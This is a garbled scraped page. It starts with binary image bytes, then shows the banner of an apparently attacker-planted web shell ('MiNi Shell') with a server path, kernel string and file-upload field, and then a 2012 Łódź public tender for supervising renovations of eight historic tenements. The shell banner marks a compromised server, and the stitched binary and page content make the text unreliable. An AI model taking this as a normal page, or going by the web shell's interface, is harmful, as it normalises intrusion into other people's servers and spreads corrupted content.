JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120307/70944-N-2012.html

<p class="kh_header"><b>Łódź: NA USŁUGĘ POLEGAJĄCĄ NA PEŁNINIU FUNKCJI INWESTORA ZASTĘPCZEGO DLA ZADANIA INWESTYCYJNEGO MIA 100 KAMIENIC W NIERUCHOMOŚCIACH ADMINISTROWANYCH PRZEZ AN ŁÓDŹ POLESIE RADWAŃSKA</b><br>
<b>Numer ogłoszenia: 70944 - 2012; data zamieszczenia: 07.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Polesie "Radwańska" , ul. Radwańska 31, 90-540 Łódź, woj. łódzkie, tel. 042 6372736, faks 042 6372826.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> radwanska,com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA USŁUGĘ POLEGAJĄCĄ NA PEŁNINIU FUNKCJI INWESTORA ZASTĘPCZEGO DLA ZADANIA INWESTYCYJNEGO MIA 100 KAMIENIC W NIERUCHOMOŚCIACH ADMINISTROWANYCH PRZEZ AN ŁÓDŹ POLESIE RADWAŃSKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia -  kody CPV:
71.24.70.00-1 Nadzór nad robotami  budowlanymi
71.54.00.00-5	Usługi zarządzania budową
71.53.00.00-2	Doradcze usługi budowlane
  71.52.00.00-9	Usługi nadzoru budowlanego
 71.63.00.00-3 Usługi kontroli i nadzoru technicznego
 71.24.40.00-0 Kalkulacja kosztów, monitoring kosztów
Przedmiotem zamówienia jest usługa polegająca na wykonaniu obowiązków Inwestora Zastępczego w zakresie pełnienia czynności nadzoru inwestorskiego obejmującego badanie ofert, realizację i rozliczenie zadania inwestycyjnego pn. MIA 100 KAMIENIC w nieruchomościach gminnych administrowanych przez AN Radwańska oraz wykonywanie na rzecz Zamawiającego uprawnień wynikających z tytułu gwarancji jakości i rękojmi za wady zrealizowanej inwestycji.
Zamawiający zaleca przeprowadzenie wizji lokalnej celem szczegółowego zapoznania się ze 
specyfiką i charakterem nieruchomości objętych zamówieniem. Zamawiający nie będzie 
respektował żadnych zarzutów wynikających z nieznajomości przez wykonawców specyfiki
i charakteru nieruchomości, jeśli okoliczności te możliwe były do ustalenia przy przeprowadzonej z należytą starannością wizji lokalnej.
W ramach realizacji przedmiotu umowy Inwestor Zastępczy zobowiązany jest 
w szczególności do:
1.	Zapoznania się z dokumentacją projektową przedmiotowych inwestycji w zakresie merytorycznym celem przygotowania wraz z wyłonionym wykonawcą harmonogramu realizacji zleconych robót budowlanych Harmonogram ma być gotowy w terminie 7 dni od dnia podpisania z wykonawcą umowy przez Zamawiającego.
2. Występowania do instytucji i urzędów, w zakresie niezbędnym do realizacji   
       roboty budowlanej, przez cały okres jej trwania, w szczególności dokonanie zgłoszenia o rozpoczęciu robót do odpowiedniego organu nadzoru budowlanego.
3. Reprezentowania Zamawiającego na budowie, pełnienia funkcji koordynacyjnych, 
      w szczególności:
1.   przejęcie obowiązków Zamawiającego wobec wykonawców robót budowlanych, 
 2. zorganizowanie i udział w przekazaniu terenu budowy wykonawcy roboty 
             budowlanej oraz przekazanie dziennika  budowy,
  a/ kontrola procesu realizacji roboty budowlanej - przejęcie od wykonawcy  opisu 
  procedur prowadzenia robót, stosowanych metod, weryfikacja poprawności ich 
   wykonania oraz raportowanie postępów i zagrożeń w ich realizacji, 
   b/ dokonywanie z wykonawcą roboty budowlanej stosownych uzgodnień  w zakresie 
    realizacji projektu oraz egzekwowanie uzupełnień w projekcie, od autora projektu
   w zakresie:
    - uzgadniania możliwości wprowadzania rozwiązań zamiennych w stosunku do
  przewidzianych w projekcie, w szczególności gdy okażą się korzystne dla 
  zamawiającego, zwłaszcza gdy będą miały wpływ na obniżenie kosztów
  inwestycji
     - uzupełnienia dokumentacji i wyjaśniania wątpliwości dotyczących realizacji 
   projektu,
 c/ bieżące analizowanie i eliminowanie zagrożeń dla prawidłowej realizacji roboty 
  budowlanej tj. ryzyk w zakresach terminowym, technicznym i finansowym,
  wynikłych w trakcie wykonywania robót, 
    d/ bieżąca weryfikacja i aktualizacji harmonogramu rzeczowo - terminowo - 
     finansowego, przedkładanie ich do akceptacji Zamawiającemu i dokonywanie 
     uzgodnień z wykonawcą roboty budowlanej w tym zakresie,
   e/  pełnienie obowiązków nadzoru inwestorskiego - wyznaczenie inspektorów nadzoru  inwestorskiego na czas prowadzenia robót budowlanych,
   f/  bieżący nadzór nad robotami budowlanymi w zakresie przewidzianym przepisami 
    ustawy prawo budowlane dla nadzoru inwestorskiego, w szczególności:
    - kontrolowanie jakości wykonanych robót oraz zastosowanych materiałów 
      i urządzeń, ich zgodności z warunkami pozwolenia na budowę, przepisami 
       budowlanymi, obowiązującymi normami i zasadami bezpieczeństwa procesu 
      budowy oraz zasadami wiedzy technicznej jak również ich zgodności 
     z dokumentacją projektową, ofertą przetargową wykonawcy roboty budowlanej 
      oraz zawartą z nim umową,
      - sprawdzenia posiadania przez wykonawcę roboty budowlanej odpowiednich 
           dokumentów (atestów, certyfikatów, świadectw jakości, wyników badań) 
           dotyczących materiałów i urządzeń,
        - kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim 
         wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny 
         właściwego wykonania robót,  
           - weryfikacja kosztorysów (kalkulacji) wykonawcy robót budowlanych pod 
           względem finansowym oraz rzeczowym, zgodności z obowiązującymi normami 
           (nakładami rzeczowymi), 
           - czuwanie nad  terminowością realizacji zadania - kontrola zgodności przebiegu 
          robót z przyjętym i obowiązującym harmonogramem rzeczowo-terminowo-
            finansowym, 
             - spisywanie protokołów konieczności na roboty dodatkowe lub zamienne 
               wspólnie z kierownikiem budowy i w uzgodnieniu z Zamawiającym, 
      - organizowanie i dokonywanie wszelkich odbiorów wykonywanych robót 
      (częściowych, zanikających, zamiennych, ponaprawczych) oraz odbioru 
       końcowego roboty budowlanej. W ramach tych czynności Inwestor Zastępczy 
     zobowiązany jest do: stwierdzenia kompletności dokumentacji odbiorowej      wraz z niezbędnymi uzgodnieniami, opiniami i decyzjami, przekazania    Zamawiającemu protokołu odbioru, przedstawienia Zamawiającemu stanowiska 
w sprawie wad stwierdzonych podczas poszczególnych odbiorów,
            - podejmowanie, po uzgodnieniu z Zamawiającym, decyzji w kwestii wad 
           w wykonanej robocie budowlanej, w tym ustalenie wysokości ewentualnego 
            obniżenia wynagrodzenia wykonawcy roboty budowlanej, z tytułu wad,
     -  egzekwowanie wykonania ewentualnych wad i nadzór nad usuwaniem tych wad,
      -  organizowanie cyklicznych narad koordynacyjnych na budowie, nie rzadziej niż 
       raz na tydzień
     -   rozwiązywanie bieżących problemów technicznych powstających na budowie,
      -  składanie Zamawiającemu miesięcznych, pisemnych raportów, w terminie do 10
       dnia po upływie każdego miesiąca kalendarzowego, zawierających informacje 
       o czynnościach wykonywanych przez Inwestora Zastępczego, stanie 
       zaawansowania realizacji roboty budowlanej, wszelkich przypadkach 
        ujawnionych wad i opóźnień w realizacji roboty budowlanej,
        - kontrola prawidłowości fakturowania robót przez wykonawcę robót 
         budowlanych - sprawdzanie i zatwierdzanie faktur do zapłaty,
          -  naliczanie w imieniu Zamawiającego kar umownych i obliczanie wysokości 
           odszkodowań zgodnie z treścią umowy na wykonanie roboty budowlanej ich 
           dochodzenie i egzekwowanie,
 
   - sporządzenie i przekazanie Zamawiającemu harmonogramu przeglądów
   wynikających z: uzyskanej od wykonawcy roboty budowlanej karty 
   gwarancyjnej i instrukcji użytkowania i eksploatacji obiektów, udzielonych 
   przez producentów gwarancji na zabudowane materiały i urządzenia, rękojmi na 
    przebudowane lub remontowane obiekty,
     -   prowadzenie i archiwizacja korespondencji dotyczącej roboty budowlanej oraz 
          przekazanie jej Zamawiającemu w stanie kompletnym po jej zakończeniu,
       -  wykonanie innych czynności inwestorskich uzgodnionych w toku realizacji 
             umowy,
         -    rozliczenie końcowe roboty budowlanej,
         -  przygotowanie i dostarczenie Zamawiającemu wszelkich innych informacji 
          związanych z robotą budowlaną wymaganych zgodnie z prawem budowlanym.
5. Sporządzenia i przekazania Zamawiającemu protokołu wykonania wraz z dokumentami, o których mowa poniżej w ust. 6 czynności związanych z pełnieniem funkcji Inwestora Zastępczego. 
6. Zamawiający podpisze protokół, o którym mowa w ust. 5, po dołączeniu do niego 
     przez Inwestora Zastępczego następujących dokumentów:
    1) protokołu odbioru końcowego roboty budowlanej wraz z ewentualnymi 
      protokołami  usunięcia stwierdzonych wad;
     2)  końcowego rozliczenia roboty budowlanej;
3)	protokołu przejęcia obiektów do eksploatacji wraz z załączonymi dokumentami: 
- zaktualizowaną dokumentacją projektową,
           - kompletem dokumentów odbiorowych umożliwiających eksploatację obiektów,
           - korespondencją i inną dokumentacją dotyczącą roboty budowlanej,
 7. Inwestor Zastępczy zobowiązany jest do dostarczenia ww. dokumentów nie później 
      niż w terminie 10 dni od dnia odbioru roboty budowlanej potwierdzonej protokołem zdawczo-odbiorczym przez Zamawiającego i nie później niż w terminie 15 dni od  uzyskania decyzji o pozwoleniu na użytkowanie obiektu, o ile taka decyzja jest  wymagana. 
8. Podpisanie protokołu przez Zamawiającego jest podstawą do ostatecznego rozliczenia wynagrodzenia Inwestora Zastępczego. 




Zamówienie podzielone jest na 8 części gdzie:
Część I
           Roboty budowlane będą prowadzone w budynku zamieszkałym.
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 33 w Łodzi w zakresie : 
Wymiana stropu nad lokalem nr 18
Wymiana stropu nad piwnicą
Wzmocnienie stropu lokalu nr 31 oraz odciążenie stropu poddasza 
Wzmocnienie ścian zewnętrznych nadproży i ściągi klatki schodowej
Przemurowanie przewodów kominowych
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Kopernika 33

Budynek znajduje się w ewidencji zabytków

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .
Część II
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 157 w Łodzi w zakresie : 
Remont  elewacji 
Wymiana stolarki budowlanej na drewnianą 
Remont  dachu  
Izolacja piwnic 
Budynek gospodarczy 
Remont powierzchni podwórka polegający na demontażu starej nawierzchni i ułożeniu kostki brukowej betonowej 
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wymiana stolarki budowlanej na drewnianą 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym Wólczańska 157

Budynek znajduje się w ewidencji zabytków

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .
Roboty budowlane będą prowadzone w budynku zamieszkałym.
Część III
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 151 w Łodzi w zakresie : 
Remont  dachu - lewa oficyna
Remont  elewacji front + lewa oficyna + izolacje remontowanych balkonów
Remont elewacji podłużnej + docieplenie dwóch szczytów lewej oficyny + remont balkonów
Remont prześwitu bramowego 
Remont klatek schodowych front + lewa oficyna
Wymiana stropu nad piwnicami + wymiana polepy stropu poddasza
Rozbiórka przybudówki - lewa oficyna
Przemurowanie przewodów kominowych
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Ogrodzenie nawierzchnia z  kostki brukowej, mała architektura tereny zielone 
Wymiana stolarki budowlanej 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym przy ul. Wólczańska 151

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym.
Część IV
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Kopernika 52 w Łodzi w zakresie : 

Remont  dekarskie front + oficyna
Wymiana i renowacja stolarki okiennej i drzwiowej 
Remont elewacji budynku oficyny
Naprawa tarasu
Remont budynku gospodarczego
Remont budynku gospodarczego - pergola
Malowanie elewacji ogrodzenie i brama budynek frontowy
Malowanie klatki schodowej i piwnicy
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wymiana i renowacja stolarki okiennej i drzwiowej 
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Kopernika 52

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym.

Część V
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 147A w Łodzi w zakresie : 

Elewacja ściany od strony podwórza  
Elewacja frontowa
Izolacja od strony ulicy
Przemurowanie gzymsów od podwórza
Zszycie ściany od strony podwórza
Zszycie ściany frontowej
Remont balkonów
Tynkowanie kominów
Remont klatki schodowej i korytarzy
Wymiana stolarki okiennej na ścianie od podwórza
Wymiana stolarki okiennej na ścianie frontowej
Remont prześwitu
Budynek gospodarczy - murowany
Remont budynku gospodarczego 
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Zagospodarowanie terenu
Budowa pergoli 
Remont podwórza 
Wymiana stolarki okiennej na ścianie od podwórza
Wymiana stolarki okiennej na ścianie frontowej
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalnym Wólczańska 147A
Remont podłogi w lokalu nr 1 i 3
Remont poddasza

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym.
Część VI
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Radwańskiej 31 w Łodzi w zakresie : 
Remont elewacji budynku
Wykonanie izolacji ścian fundamentowych
Wymiana sztukaterii  budynku frontowego
Remont klatki schodowej
Wymiana stolarki na drewnianą
Remont komórek
Wykonanie pergoli remont ogrodzenia
Wykonanie nawierzchni z kostki brukowej
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Radwańskiej 31

Wskaźniki obiektów 
Budynek frontowy pow. zabudowy 332 m2

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym.

Część VII
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 145 w Łodzi w zakresie : 
Elewacja frontowa
Ogrodzenie
Budynek gospodarczy - ściany
Elewacja południowa - lewa oficyna
Ściana szczytowa docieplenia
Ściana lewej oficyny od podwórza
Ściana zachodnia budynku frontowego
Budynek mieszkalny parterowy - roboty dekarskie
Docieplenie budynku mieszkalnego parterowego
Malowanie ściany piekarni
Malowanie klatki schodowej lewej oficyny
Malowanie klatki schodowej front
Docieplenie ściany szczytowej lewej oficyny
Remont nawierzchni posesji
Docieplenie stropu budynku frontowego
Docieplenie stropu lewej oficyny
Roboty dekarskie - komórkowiec
Roboty dekarskie - lewa oficyna
Roboty dekarskie - budynek frontowy
Roboty remontowe komórkowiec
Remont prześwitu bramowego
Wymiana stolarki na drewnianą
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Wólczańskiej 145

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego .

Budynek znajduje się w ewidencji zabytków
Roboty budowlane będą prowadzone w budynku zamieszkałym.

Część V III
Przedmiotem niniejszego zamówienia jest wykonywanie remontu kamienicy przy 
ul. Wólczańska 169 w Łodzi w zakresie : 
Remont elewacji budynków
Wykonanie izolacji ścian fundamentowych
Wzmocnienie nadproży okiennych
Wzmocnienie ścian zewnętrznych w miejscach pęknięć
Wymiana sztukaterii budynku frontowego
Remont klatki schodowej
Wymiana stolarki na drewnianą
Remont prześwitu bramowego polegający na uzupełnieniu tynków ścian i sufitów oraz malowaniu emulsyjnymi olejnym. Wykonanie wrót bramowych wg rysunku załączonego do projektu
Wykonanie nawierzchni z kostki brukowej
Adaptacja pomieszczenia węzłów centralnego ogrzewania
Wykonanie instalacji centralnego ogrzewania systemu wodnego dwururowego pompowego w budynku mieszkalno-usługowym przy ul. Wólczańskiej 169

Wskaźniki obiektów 
Budynek frontowy pow. zabudowy 342,70 m2
Budynek prawej oficyny pow.  Zabudowy 140,00 m2
Roboty budowlane będą prowadzone w budynku zamieszkałym.
Budynek znajduje się w ewidencji zabytków

Szczegółowe informacje zawierają  Projekty Techniczne udostępnione na stronie internetowej Zamawiającego ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.53.00.00-2, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków art.22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeże żeli wykonawca: dysponuje osobami które będą odpowiedzialne za świadczenie usługi nadzoru oraz kontrolę jakości robót tj.: w szczególności:
 1 osobą, która będzie kierować (koordynować) zespołem inspektorów nadzoru 
 w specjalnościach (branżach objętych przedmiotu zamówienia) i posiada uprawnienia do   pełnienia samodzielnych funkcji w budownictwie w zakresie nadzoru inwestorskiego, o którym mowa w art. 12 ust.1 pkt.4 ustawy Prawo budowlane tj. uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub architektonicznej i co najmniej 3-letnie doświadczenie zawodowe w kierowaniu/nadzorowaniu wykonania robót budowlanych,   w tym kierowaniu/nadzorowaniu co najmniej 2 robót budowlanych o wartości brutto min.   400.000,00 zł (każda) obejmującej prace budowlane w obiekcie będącym budynkiem znajdującym się w ewidencji zabytków, mieszkalnym wielorodzinnym oraz legitymują się aktualnym zaświadczenie    o przynależności do właściwej izby samorządu zawodowego;
  b) inspektorami nadzoru w specjalności: architektonicznej, budowlano-konstrukcyjnej, instalacyjnych  w zakresie i instalacyjnej sieci, urządzeń cieplnych, wentylacyjnych elektrycznych, którzy posiadają  uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi 
zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U z 2010r.Nr 243 poz. 1623 ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 ze zm.) lub równoważne odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów;
Zamawiający dopuszcza połaczenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
c) 1 osobą  ds. rozliczeń finansowych i raportowania posiadającą mini. 3-letnie doświadczenie zawodowe, w tym doświadczenie w zakresie prowadzenia obmiarów, analizy kosztów budowy, rozliczania rzeczowo-finansowego oraz sporządzania raportów, znajomość problematyki tworzenia środków trwałych zgodnie z prawem budowlanym i podatkowym na co najmniej jednym kontrakcie/umowie  o wartości robót min. 1 000 000 zł brutto;
Wzór wykazu osób -załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a przypadku jej braku innego dokumentu , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  
Warunek zostanie uznany za spełniony gdy wartość przedstawionej polisy co najmniej 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

